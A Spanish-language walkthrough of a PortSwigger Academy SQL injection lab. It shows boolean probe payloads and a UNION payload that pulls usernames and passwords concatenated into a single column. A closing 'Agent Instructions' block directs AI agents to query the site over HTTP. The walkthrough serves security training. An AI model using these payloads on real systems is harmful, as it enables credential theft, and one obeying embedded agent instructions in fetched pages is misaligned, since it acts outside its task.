# Lab: SQL injection UNION attack, retrieving multiple values in a single column

## Información del laboratorio

<https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns>

En este laboratorio hay una vulnerabilidad de inyección SQL en el filtro de la categoría del producto.

Esta vulnerabilidad es similar a las de los laboratorios:

* [Lab: SQL injection UNION attack, determining the number of columns returned by the query](/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query.md)
* [Lab: SQL injection UNION attack, finding a column containing text](/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-finding-a-column-containing-text.md)
* [Lab: SQL injection UNION attack, retrieving data from other tables](/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-retrieving-data-from-other-tables.md)

## Flujo de explotación

### Identificación del parámetro vulnerable

Para verificar que es vulnerable, se usan payloads con el operador lógico AND, por ejemplo: `'and'1337'='1337` y `'and'1337'='1338`.

Se identifica de la misma forma que el laboratorio: [Lab: SQL injection UNION attack, retrieving data from other tables](/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-retrieving-data-from-other-tables.md)

### Obtención de usuarios y contraseñas en una misma columna

```sql
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
```

<figure><img src="/files/i0OGcFLvhKvOOKpPTeBl" alt=""><figcaption></figcaption></figure>

Como se puede observar, en la segunda columna se muestra el valor de ambas columnas:

```
username~password
```

<figure><img src="/files/bIsqEaCkmPkDfYO7nDy9" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.xtormin.com/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-retrieving-multiple-values-in-a-single-column.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.